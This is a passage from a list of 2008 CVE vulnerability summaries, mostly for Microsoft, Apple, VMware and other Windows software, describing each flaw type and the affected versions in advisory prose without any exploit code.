errors during access to incorrectly initialized objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to corruption of the "system state," aka "FlexGrid Control Memory Corruption Vulnerability." [CVE-2008-4252] The DataGrid ActiveX control in Microsoft Visual Basic 6.0 and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 does not properly handle errors during access to incorrectly initialized objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to corruption of the "system state," aka "DataGrid Control Memory Corruption Vulnerability." [CVE-2008-4211] Integer signedness error in (1) QuickLook in Apple Mac OS X 10.5.5 and (2) Office Viewer in Apple iPhone OS 1.0 through 2.1 and iPhone OS for iPod touch 1.1 through 2.1 allows remote attackers to cause a denial of service (application termination) and execute arbitrary code via a crafted Microsoft Excel file that triggers an out-of-bounds memory access, related to "handling of columns." [CVE-2008-4197] Opera before 9.52 on Windows, Linux, FreeBSD, and Solaris, when processing custom shortcut and menu commands, can produce argument strings that contain uninitialized memory, which might allow user-assisted remote attackers to execute arbitrary code or conduct other attacks via vectors related to activation of a shortcut. [CVE-2008-4163] Unspecified vulnerability in ISC BIND 9.3.5-P2-W1, 9.4.2-P2-W1, and 9.5.0-P2-W1 on Windows allows remote attackers to cause a denial of service (UDP client handler termination) via unknown vectors. [CVE-2008-4110] Buffer overflow in the SQLVDIRLib.SQLVDirControl ActiveX control in Tools\Binn\sqlvdir.dll in Microsoft SQL Server 2000 (aka SQL Server 8.0) allows remote attackers to cause a denial of service (browser crash) or possibly execute arbitrary code via a long URL in the second argument to the Connect method. NOTE: this issue is not a vulnerability in many environments, since the control is not marked as safe for scripting and would not execute with default Internet Explorer settings. [CVE-2008-4033] Cross-domain vulnerability in Microsoft XML Core Services 3.0 through 6.0, as used in Microsoft Expression Web, Office, Internet Explorer, and other products, allows remote attackers to obtain sensitive information from another domain and corrupt the session state via HTTP request header fields, as demonstrated by the Transfer-Encoding field, aka "MSXML Header Request Vulnerability." [CVE-2008-4032] Microsoft Office SharePoint Server 2007 Gold and SP1 and Microsoft Search Server 2008 do not properly perform authentication and authorization for administrative functions, which allows remote attackers to cause a denial of service (server load), obtain sensitive information, and "create scripts that would run in the context of the site" via requests to administrative URIs, aka "Access Control Vulnerability." [CVE-2008-4031] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4030] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4029] Cross-domain vulnerability in Microsoft XML Core Services 3.0 and 4.0, as used in Internet Explorer, allows remote attackers to obtain sensitive information from another domain via a crafted XML document, related to improper error checks for external DTDs, aka "MSXML DTD Cross-Domain Scripting Vulnerability." [CVE-2008-4028] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4027] Double free vulnerability in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4026] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4025] Integer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4024] Microsoft Office Word 2000 SP3 and 2002 SP3 and Office 2004 for Mac allow remote attackers to execute arbitrary code via a Word document with a crafted lcbPlcfBkfSdt field in the File Information Block (FIB), which bypasses an initialization step and triggers an "arbitrary free," aka "Word Memory Corruption Vulnerability." [CVE-2008-4020] Cross-site scripting (XSS) vulnerability in Microsoft Office XP SP3 allows remote attackers to inject arbitrary web script or HTML via a document that contains a "Content-Disposition: attachment" header and is accessed through a cdo: URL, which renders the content instead of raising a File Download dialog box, aka "Vulnerability in Content-Disposition Header Vulnerability." [CVE-2008-4019] Integer overflow in the REPT function in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2 and SP3, and 2007 Gold and SP1 [CVE-2008-3973] Unspecified vulnerability in the SQLPlus Windows GUI component in Oracle Database allows local users to affect confidentiality via unknown vectors. [CVE-2008-3956] orgchart.exe in Microsoft Organization Chart 2.00 allows user-assisted attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted .opx file. [CVE-2008-3897] DiskCryptor 0.2.6 on Windows stores pre-boot authentication passwords in the BIOS Keyboard buffer and does not clear this buffer before and after use, which allows local users to obtain sensitive information by reading the physical memory locations associated with this buffer. [CVE-2008-3851] Multiple directory traversal vulnerabilities in Pluck CMS 4.5.2 on Windows allow remote attackers to include and execute arbitrary local files via a ..\ (dot dot backslash) in the (1) blogpost, (2) cat, and (3) file parameters to data/inc/themes/predefined_variables.php, as reachable through index.php [CVE-2008-3843] Request Validation (aka the ValidateRequest filters) in ASP.NET in Microsoft .NET Framework with the MS07-040 update does not properly detect dangerous client input, which allows remote attackers to conduct cross-site scripting (XSS) attacks, as demonstrated by a query string containing a "<~/" (less-than tilde slash) sequence followed by a crafted STYLE element. [CVE-2008-3842] Request Validation (aka the ValidateRequest filters) in ASP.NET in Microsoft .NET Framework without the MS07-040 update does not properly detect dangerous client input, which allows remote attackers to conduct cross-site scripting (XSS) attacks, as demonstrated by a query string containing a "</" (less-than slash) sequence. [CVE-2008-3704] Heap-based buffer overflow in the MaskedEdit ActiveX control in Msmask32.ocx 6.0.81.69, and possibly other versions before 6.0.84.18, in Microsoft Visual Studio 6.0, Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 allows remote attackers to execute arbitrary code via a long Mask parameter, related to not "validating property values with boundary checks," as exploited in the wild in August 2008, aka "Masked Edit Control Memory Corruption Vulnerability." [CVE-2008-3703] The management console in the Volume Manager Scheduler Service (aka VxSchedService.exe) in Symantec Veritas Storage Foundation for Windows (SFW) 5.0, 5.0 RP1a, and 5.1 accepts NULL NTLMSSP authentication, which allows remote attackers to execute arbitrary code via requests to the service socket that create "snapshots schedules" registry values specifying future command execution. NOTE: this issue exists because of an incomplete fix for CVE-2007-2279. [CVE-2008-3698] Unspecified vulnerability in the OpenProcess function in VMware Workstation 5.5.x before 5.5.8 build 108000, VMware Workstation 6.0.x before 6.0.5 build 109488, VMware Player 1.x before 1.0.8 build 108000, VMware Player 2.x before 2.0.5 build 109488, VMware ACE 1.x before 1.0.7 build 108880, VMware ACE 2.x before 2.0.5 build 109488, and VMware Server before 1.0.7 build 108231 on Windows allows local host OS users to gain privileges on the host OS via unknown vectors. [CVE-2008-3635] Stack-based buffer overflow in QuickTimeInternetExtras.qtx in an unspecified third-party Indeo v3.2 (aka IV32) codec for QuickTime, when used with Apple QuickTime before 7.5.5 on Windows, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. [CVE-2008-3630] mDNSResponder in Apple Bonjour for Windows before 1.0.5, when an application uses the Bonjour API for unicast DNS, does not choose random values for transaction IDs or source ports in DNS requests, which makes it easier for remote attackers to spoof DNS responses, a different vulnerability than CVE-2008-1447. [CVE-2008-3628] Apple QuickTime before 7.5.5 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image, related to an "invalid pointer issue." [CVE-2008-3623] Heap-based buffer overflow in CoreGraphics in Apple Safari before 3.2 on Windows, in iPhone OS 1.0 through 2.2.1, and in iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted image, related to improper handling of color spaces. [CVE-2008-3615] ir50_32.qtx in an unspecified third-party Indeo v5 codec for QuickTime, when used with Apple QuickTime before 7.5.5 on Windows, accesses uninitialized memory, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. [CVE-2008-3614] Integer overflow in Apple QuickTime before 7.5.5 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image, which triggers heap corruption. [CVE-2008-3539] Unspecified vulnerability in HP OpenView Select Identity (HPSI) Connectors on Windows, as used in HPSI Active Directory Connector 2.30 and earlier, HPSI SunOne Connector 1.14 and earlier, HPSI eDirectory Connector 1.12 and earlier, HPSI eTrust Connector 1.02 and earlier, HPSI OID Connector 1.02 and earlier, HPSI IBM Tivoli Dir Connector 1.02 and earlier, HPSI TOPSecret Connector 2.22.001 and earlier, HPSI RACF Connector 1.12.001 and earlier, HPSI ACF2 Connector 1.02 and earlier, HPSI OpenLDAP Connector 1.02 and earlier, and HPSI BiDir DirX Connector 1.00.003 and earlier, allows local users to obtain sensitive information via unknown vectors. [CVE-2008-3538] Unspecified vulnerability in HP Enterprise Discovery 2.0 through 2.52 on Windows allows remote authenticated users to execute arbitrary code via unknown vectors. NOTE: the initial description of this CVE was inadvertently associated with libxml2, but it should be for HP Enterprise Discovery. [CVE-2008-3493] vncviewer.exe in RealVNC Windows Client 4.1.2.0 allows remote VNC servers to cause a denial of service (application crash) via a crafted frame buffer update packet. [CVE-2008-3477] Microsoft Excel 2000 SP3, 2002 SP3, and 2003 SP2 and SP3 does not properly validate data in the VBA Performance Cache when processing an Office document with an embedded object, which allows remote attackers to execute arbitrary code via an Excel file containing a crafted value, leading to heap-based buffer overflows, integer overflows, array index errors, and memory corruption, aka "Calendar Object Validation Vulnerability." [CVE-2008-3476] Microsoft Internet Explorer 5.01 SP4 and 6 does not properly handle errors associated with access to uninitialized memory, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "HTML Objects Memory Corruption Vulnerability." [CVE-2008-3475] Microsoft Internet Explorer 6 does not properly handle errors related to using the componentFromPoint method on xml objects that have been (1) incorrectly initialized or (2) deleted, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2008-3474] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy and obtain sensitive information via a crafted HTML document, aka "Cross-Domain Information Disclosure Vulnerability." [CVE-2008-3473] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy, and execute arbitrary code or obtain sensitive information, via a crafted HTML document, aka "Event Handling Cross-Domain Vulnerability." [CVE-2008-3472] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy, and execute arbitrary code or obtain sensitive information, via a crafted HTML document, aka "HTML Element Cross-Domain Vulnerability." [CVE-2008-3471] Stack-based buffer overflow in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2 and SP3, and 2007 Gold and SP1 [CVE-2008-3466] Microsoft Host Integration Server (HIS) 2000, 2004, and 2006 does not limit RPC access to administrative functions, which allows remote attackers to bypass authentication and execute arbitrary programs via a crafted SNA RPC message using opcode 1 or 6 to call the CreateProcess function, aka "HIS Command Execution Vulnerability." [CVE-2008-3460] WPGIMP32.FLT in Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3459] Unspecified vulnerability in OpenVPN 2.1-beta14 through 2.1-rc8, when running on non-Windows systems, allows remote servers to execute arbitrary commands via crafted (1) lladdr and (2) iproute configuration directives, probably related to shell metacharacters. [CVE-2008-3365] Directory traversal vulnerability in index.php in Pixelpost 1.7.1 on Windows, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language_full parameter. [CVE-2008-3363] Directory traversal vulnerability in user_portal.php in the Dokeos E-Learning System 1.8.5 on Windows allows remote attackers to include and execute arbitrary local files via a ..\ (dot dot backslash) in the include parameter. [CVE-2008-3173] Microsoft Internet Explorer allows web sites to set cookies for domains that have a public suffix with more than one dot character, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session, aka "Cross-Site Cooking." NOTE: this issue may exist because of an insufficient fix for CVE-2004-0866. [CVE-2008-3158] Unspecified vulnerability in NWFS.SYS in Novell Client for Windows 4.91 SP4 has unknown impact and attack vectors, possibly related to IOCTL requests that overwrite arbitrary memory. [CVE-2008-3079] Unspecified vulnerability in Opera before 9.51 on Windows allows attackers to execute arbitrary code via unknown vectors. [CVE-2008-3021] Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3020] Microsoft Office 2000 SP3 and XP SP3 [CVE-2008-3019] Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3018] Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3015] Integer overflow in gdiplus.dll in GDI+ in Microsoft Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a BMP image file with a malformed BitMapInfoHeader that triggers a buffer overflow, aka "GDI+ BMP Integer Overflow Vulnerability." [CVE-2008-3007] Argument injection vulnerability in a URI handler in Microsoft Office XP SP3, 2003 SP2 and SP3, 2007 Office System Gold and SP1, and Office OneNote 2007 Gold and SP1 allow remote attackers to execute arbitrary code via a crafted onenote:// URL, aka "Uniform Resource Locator Validation Error Vulnerability." [CVE-2008-3006] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP2 and SP3, and 2007 Gold and SP1 [CVE-2008-3005] Array index vulnerability in Microsoft Office Excel 2000 SP3 and 2002 SP3, and Office 2004 and 2008 for Mac allows remote attackers to execute arbitrary code via an Excel file with a crafted array index for a FORMAT record, aka the "Excel Index Array Vulnerability." [CVE-2008-3004] Microsoft Office Excel 2000 SP3, 2002 SP3, and 2003 SP2 and SP3 [CVE-2008-3003] Microsoft Office Excel 2007 Gold and SP1 does not properly delete the PWD (password) string from connections.xml when a .xlsx file is configured not to save the remote data session password, which allows local users to obtain sensitive information and obtain access to a remote data source, aka the "Excel Credential Caching Vulnerability." [CVE-2008-2959] Buffer overflow in a certain ActiveX control (vb6skit.dll) in Microsoft Visual Basic Enterprise Edition 6.0 SP6 might allow remote attackers to execute arbitrary code via a long lpstrLinkPath argument to the fCreateShellLink function. [CVE-2008-2949] Cross-domain vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to change the location property of a frame via the String data type, and use a frame from a different domain to observe domain-independent events, as demonstrated by observing onkeydown events with caballero-listener. NOTE: according to Microsoft, this is a duplicate of CVE-2008-2947, possibly a different attack vector. [CVE-2008-2948] Cross-domain vulnerability in Microsoft Internet Explorer 7 and 8 allows remote attackers to change the location property of a frame via the Object data type, and use a frame from a different domain to observe domain-independent events, as demonstrated by observing onkeydown events with caballero-listener. NOTE: according to Microsoft, this is a duplicate of CVE-2008-2947, possibly a different attack vector. [CVE-2008-2947] Cross-domain vulnerability in Microsoft Internet Explorer 5.01 SP4, 6, and 7 allows remote attackers to access restricted information from other domains via JavaScript that uses the Object data type for the value of a (1) location or (2) location.href property, related to incorrect determination of the origin of web script, aka "Window Location Property Cross-Domain Vulnerability." NOTE: according to Microsoft, CVE-2008-2948 and CVE-2008-2949 are duplicates of this issue, probably different attack vectors. [CVE-2008-2908] Multiple stack-based buffer overflows in a certain ActiveX control in ienipp.ocx in Novell iPrint Client for Windows before 4.36 allow remote attackers to execute arbitrary code via a long value of the (1) operation, (2) printer-url, or (3) target-frame parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-2894] Directory traversal vulnerability in the FTP client in NCH Software Classic FTP 1.02 for Windows allows remote FTP servers to create or overwrite arbitrary files via a .. (dot dot) in a response to a LIST command, a related issue to CVE-2002-1345. [CVE-2008-2841] Argument injection vulnerability in XChat 2.8.7b and earlier on Windows, when Internet Explorer is used, allows remote attackers to execute arbitrary commands via the --command parameter in an ircs:// URI. [CVE-2008-2821] Directory traversal vulnerability in the FTP client in Glub Tech Secure FTP before 2.5.16 on Windows allows remote FTP servers to create or overwrite arbitrary files via a ..\ (dot dot backslash) in a response to a LIST command, a related issue to CVE-2002-1345. [CVE-2008-2810] Mozilla Firefox before 2.0.0.15 and SeaMonkey before 1.1.10 do not properly identify the context of Windows shortcut files, which allows user-assisted remote attackers to bypass the Same Origin Policy via a crafted web site for which the user has previously saved a shortcut. [CVE-2008-2752] Microsoft Word 2000 9.0.2812 and 2003 11.8106.8172 does not properly handle unordered lists, which allows user-assisted remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted .doc file. NOTE: some of these details are obtained from third party information. [CVE-2008-2747] No-IP Dynamic Update Client (DUC) 2.2.1 on Windows uses weak permissions for the HKLM\SOFTWARE\Vitalwerks\DUC registry key, which allows local users to obtain obfuscated passwords and other sensitive information by reading the (1) TrayPassword, (2) Username, (3) Password, and (4) Hosts registry values. [CVE-2008-2703] Multiple stack-based buffer overflows in Novell GroupWise Messenger (GWIM) Client before 2.0.3 HP1 for Windows allow remote attackers to execute arbitrary code via "spoofed server responses" that contain a long string after the NM_A_SZ_TRANSACTION_ID field name. [CVE-2008-2463] The Microsoft Office Snapshot Viewer ActiveX control in snapview.ocx 10.0.5529.0, as distributed in the standalone Snapshot Viewer and Microsoft Office Access 2000 through 2003, allows remote attackers to download arbitrary files to a client machine via a crafted HTML document or e-mail message, probably involving use of the SnapshotPath and CompressedPath properties and the PrintSnapshot method. NOTE: this can be leveraged for code execution by writing to a Startup folder. [CVE-2008-2430] Integer overflow in the Open function in modules/demux/wav.c in VLC Media Player 0.8.6h on Windows allows remote attackers to execute arbitrary code via a large fmt chunk in a WAV file. [CVE-2008-2427] Stack-based buffer overflow in NConvert 4.92, GFL SDK 2.82, and XnView 1.93.6 on Windows and 1.70 on Linux and FreeBSD allows user-assisted remote attackers to execute arbitrary code via a crafted format keyword in a Sun TAAC file. [CVE-2008-2400] Unspecified vulnerability in stunnel before 4.23, when running as a service on Windows, allows local users to gain privileges via unknown attack vectors. [CVE-2008-2326] mDNSResponder in the Bonjour Namespace Provider in Apple Bonjour for Windows before 1.0.5 allows attackers to cause a denial of service (NULL pointer dereference and application crash) by resolving a crafted .local domain name that contains a long label. [CVE-2008-2325] QuickLook in Apple Mac OS X 10.4.11 and 10.5.4 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted Microsoft Office file, related to insufficient "bounds checking." [CVE-2008-2307] Unspecified vulnerability in WebKit in Apple Safari before 3.1.2, as distributed in Mac OS X before 10.5.4, and standalone for Windows and Mac OS X 10.4, allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via vectors involving JavaScript arrays that trigger memory corruption. [CVE-2008-2306] Apple Safari before 3.1.2 on Windows does not properly interpret the URLACTION_SHELL_EXECUTE_HIGHRISK Internet Explorer zone setting, which allows remote attackers to bypass intended access restrictions, and force a client system to download and execute arbitrary files. [CVE-2008-2259] Microsoft Internet Explorer 6 and 7 does not perform proper "argument validation" during print preview, which allows remote attackers to execute arbitrary code via unknown vectors, aka "HTML Component Handling Vulnerability." [CVE-2008-2258] Microsoft Internet Explorer 5.01, 6, and 7 accesses uninitialized memory in certain conditions, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via vectors related to a document object "appended in a specific order" with "particular functions ... performed on" document objects, aka "HTML Objects Memory Corruption Vulnerability" or "Table Layout Memory Corruption Vulnerability," a different vulnerability than CVE-2008-2257. [CVE-2008-2257] Microsoft Internet Explorer 5.01, 6, and 7 accesses uninitialized memory in certain conditions, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via vectors related to a document object "appended in a specific order," aka "HTML Objects Memory Corruption Vulnerability" or "XHTML Rendering Memory Corruption Vulnerability," a different vulnerability than CVE-2008-2258. [CVE-2008-2256] Microsoft Internet Explorer 5.01, 6, and 7 does not properly handle objects that have been incorrectly initialized or deleted, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2008-2255] Microsoft Internet Explorer 5.01, 6, and 7 accesses uninitialized memory, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors, a different vulnerability than CVE-2008-2254, aka "HTML Object Memory Corruption Vulnerability." [CVE-2008-2254] Microsoft Internet Explorer 6 and 7 accesses uninitialized memory, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors, aka "HTML Object Memory Corruption Vulnerability." [CVE-2008-2244] Microsoft Office Word 2002 SP3 allows remote attackers to execute arbitrary code via a .doc file that contains malformed data, as exploited in the wild in July 2008, and as demonstrated by attachement.doc. [CVE-2008-2163] Cross-site scripting (XSS) vulnerability in IBM Lotus Quickr 8.1 before Hotfix 5 for Windows and AIX, and before Hotfix 3 for i5/OS, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to "WYSIWYG editors." [CVE-2008-2161] Buffer overflow in TFTP Server SP 1.4 and 1.5 on Windows, and possibly other versions, allows remote attackers to execute arbitrary code via a long TFTP error packet. NOTE: some of these details are obtained from third party information. [CVE-2008-2159] Microsoft Internet Explorer 7 can save encrypted pages in the cache even when the DisableCachingOfSSLPages registry setting is enabled, which might allow local users to obtain sensitive information. [CVE-2008-2158] Multiple stack-based buffer overflows in the Command Line Interface process in the Server Agent in EMC AlphaStor 3.1 SP1 for Windows allow remote attackers to execute arbitrary code via crafted TCP packets to port 41025. [CVE-2008-2157] robotd in the Library Manager in EMC AlphaStor 3.1 SP1 for Windows allows remote attackers to execute arbitrary commands via an unspecified string field in a packet to TCP port 3500. [CVE-2008-2143] Unspecified versions of Microsoft Outlook Web Access (OWA) use the Cache-Control: no-cache HTTP directive instead of no-store, which might cause web browsers that follow RFC-2616 to cache sensitive information. [CVE-2008-2099] Unspecified vulnerability in VMCI in VMware Workstation 6 before 6.0.4 build 93057, VMware Player 2 before 2.0.4 build 93057, and VMware ACE 2 before 2.0.2 build 93057 on Windows allows guest OS users to execute arbitrary code on the host OS via unspecified vectors. [CVE-2008-2010] Unspecified vulnerability in Apple QuickTime Player on Windows XP SP2 and Vista SP1 allows remote attackers to execute arbitrary code via a crafted QuickTime media file. NOTE: as of 20080429, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2008-1998] The NNSTAT (aka SYSPROC.NNSTAT) procedure in IBM DB2 8 before FP16, 9.1 before FP4a, and 9.5 before FP1 on Windows allows remote authenticated users to overwrite arbitrary files via the log file parameter. [CVE-2008-1932] Integer overflow in Realtek HD Audio Codec Drivers RTKVHDA.sys and RTKVHDA64.sys before 6.0.1.5605 on Windows Vista allows local users to execute arbitrary code via a crafted IOCTL request. [CVE-2008-1931] Realtek HD Audio Codec Drivers RTKVHDA.sys and RTKVHDA64.sys before 6.0.1.5605 on Windows Vista allow local users to create, write, and read registry keys via a crafted IOCTL request. [CVE-2008-1898] A certain ActiveX control in WkImgSrv.dll 7.03.0616.0, as distributed in Microsoft Works 7 and Microsoft Office 2003 and 2007, allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value, which triggers an improper function call. [CVE-2008-1709] Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long malformed Project line beginning with a 'Project("{}") =' sequence, probably a different vector than CVE-2008-0250. [CVE-2008-1667] The Probe Builder Service (aka PBOVISServer.exe) in European Performance Systems (EPS) Probe Builder 2.2 before A.02.20.901, as used in HP OpenView Internet Services (OVIS) on Windows, allows remote attackers to kill arbitrary processes via a process ID number in an unspecified opcode. [CVE-2008-1663] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) 2.1.10 and 2.1.11 on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1625] aavmker4.sys in avast! Home and Professional 4.7 for Windows does not properly validate input to IOCTL 0xb2d60030, which allows local users to gain privileges via certain IOCTL requests. [CVE-2008-1611] Stack-based buffer overflow in TFTP Server SP 1.4 for Windows allows remote attackers to cause a denial of service or execute arbitrary code via a long filename in a read or write request. [CVE-2008-1581] Heap-based buffer overflow in Apple QuickTime before 7.5 on Windows allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via crafted packed scanlines in PixData structures in a PICT image. [CVE-2008-1547] Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. [CVE-2008-1545] The setRequestHeader method of the XMLHttpRequest object in Microsoft Internet Explorer 7 does not restrict the dangerous Transfer-Encoding HTTP request header, which allows remote attackers to conduct HTTP request splitting and HTTP request smuggling attacks via a POST containing a "Transfer-Encoding: chunked" header and a request body with an incorrect chunk size. [CVE-2008-1544] The setRequestHeader method of the XMLHttpRequest object in Microsoft Internet Explorer 5.01, 6, and 7 does not block dangerous HTTP request headers when certain 8-bit character sequences are appended to a header name, which allows remote attackers to (1) conduct HTTP request splitting and HTTP request smuggling attacks via an incorrect Content-Length header, (2) access arbitrary virtual hosts via a modified Host header, (3) bypass referrer restrictions via an incorrect Referer header, and (4) bypass the same-origin policy and obtain sensitive information via a crafted request header. [CVE-2008-1455] A "memory calculation error" in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, 2003 SP2, and 2007 through SP1 [CVE-2008-1442] Heap-based buffer overflow in the substringData method in Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code, related to an unspecified manipulation of a DOM object before a call to this method, aka the "HTML Objects Memory Corruption Vulnerability." [CVE-2008-1438] Unspecified vulnerability in Microsoft Malware Protection Engine (mpengine.dll) 1.1.3520.0 and 0.1.13.192, as used in multiple Microsoft products, allows context-dependent attackers to cause a denial of service (disk space exhaustion) via a file with "crafted data structures" that trigger the creation of large temporary files, a different vulnerability than CVE-2008-1437. [CVE-2008-1437] Unspecified vulnerability in Microsoft Malware Protection Engine (mpengine.dll) 1.1.3520.0 and 0.1.13.192, as used in multiple Microsoft products, allows context-dependent attackers to cause a denial of service (engine hang and restart) via a crafted file, a different vulnerability than CVE-2008-1438. [CVE-2008-1434] Use-after-free vulnerability in Microsoft Word in Office 2000 and XP SP3, 2003 SP2 and SP3, and 2007 Office System SP1 and earlier allows remote attackers to execute arbitrary code via an HTML document with a large number of Cascading Style Sheets (CSS) selectors, related to a "memory handling error" that triggers memory corruption. [CVE-2008-1402] MG-SOFT Net Inspector 6.5.0.828 and earlier for Windows allows remote attackers to cause a (1) denial of service (exception and crash) via a UDP packet to the SNMP Trap Service (MgWTrap3.exe) or (2) denial of service (device freeze or memory consumption) via a malformed request to the Net Inspector Server (niengine). [CVE-2008-1401] Format string vulnerability in the Net Inspector HTTP server (mghttpd) in MG-SOFT Net Inspector 6.5.0.828 and earlier for Windows allows remote attackers to execute arbitrary code via format string specifiers in the URI, which is recorded in a log file. [CVE-2008-1400] Directory traversal vulnerability in the Net Inspector HTTP Server (mghttpd) in MG-SOFT Net Inspector 6.5.0.828 and earlier for Windows allows remote attackers to read arbitrary files via a "..\" (dot dot backslash) or "../" (dot dot slash) in the URI. [CVE-2008-1368] CRLF injection vulnerability in Microsoft Internet Explorer 5 and 6 allows remote attackers to execute arbitrary FTP commands via an ftp:// URL that contains a URL-encoded CRLF (%0D%0A) before the FTP command, which causes the commands to be inserted into an authenticated FTP connection established earlier in the same browser session, as demonstrated using a DELE command, a variant or possibly a regression of CVE-2004-1166. NOTE: a trailing "//" can force Internet Explorer to try to reuse an existing authenticated connection. [CVE-2008-1363] VMware Workstation 6.0.x before 6.0.3 and 5.5.x before 5.5.6, VMware Player 2.0.x before 2.0.3 and 1.0.x before 1.0.6, VMware ACE 2.0.x before 2.0.1 and 1.0.x before 1.0.5, and VMware Server 1.0.x before 1.0.5 on Windows allow local users to gain privileges via an unspecified manipulation of a config.ini file located in an Application Data folder, which can be used for "hijacking the VMX process." [CVE-2008-1362] VMware Workstation 6.0.x before 6.0.3 and 5.5.x before 5.5.6, VMware Player 2.0.x before 2.0.3 and 1.0.x before 1.0.6, VMware ACE 2.0.x before 2.0.1 and 1.0.x before 1.0.5, and VMware Server 1.0.x before 1.0.5 on Windows allow local users to gain privileges or cause a denial of service by impersonating the authd process through an unspecified use of an "insecurely created named pipe," a different vulnerability than CVE-2008-1361. [CVE-2008-1361] VMware Workstation 6.0.x before 6.0.3 and 5.5.x before 5.5.6, VMware Player 2.0.x before 2.0.3 and 1.0.x before 1.0.6, VMware ACE 2.0.x before 2.0.1 and 1.0.x before 1.0.5, and VMware Server 1.0.x before 1.0.5 on Windows allow local users to gain privileges via an unspecified manipulation that causes the authd process to connect to an arbitrary named pipe, a different vulnerability than CVE-2008-1362. [CVE-2008-1337] The instant message service in Timbuktu Pro 8.6.5 RC 229 and earlier for Windows allows remote attackers to cause (1) a denial of service (daemon crash) via an invalid Version field or (2) a denial of service (CPU consumption and daemon termination) via an invalid or partial message. [CVE-2008-1330] Unspecified vulnerability in the Windows client API in Novell GroupWise 7 before SP3 and 6.5 before SP6 Update 3 allows remote authenticated users to access the non-shared stored e-mail messages of another user who has shared at least one folder with the attacker. [CVE-2008-1299] Cross-site scripting (XSS) vulnerability in SolutionSearch.do in ManageEngine ServiceDesk Plus 7.0.0 Build 7011 for Windows allows remote attackers to inject arbitrary web script or HTML via the searchText parameter. NOTE: the provenance of this information is unknown [CVE-2008-1280] Acronis True Image Windows Agent 1.0.0.54 and earlier, included in Acronis True Image Enterprise Server 9.5.0.8072 and the other True Image packages, allows remote attackers to cause a denial of service (crash) via a malformed packet to port 9876, which triggers a NULL pointer dereference. [CVE-2008-1204] Multiple cross-site scripting (XSS) vulnerabilities in the Administration Console in Sun Java System Access Manager 7.1 and 7 2005Q4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the (1) Help and (2) Version windows. [CVE-2008-1201] Multiple unspecified vulnerabilities in FLA file parsing in Adobe Flash CS3 Professional, Flash Professional 8, and Flash Basic 8 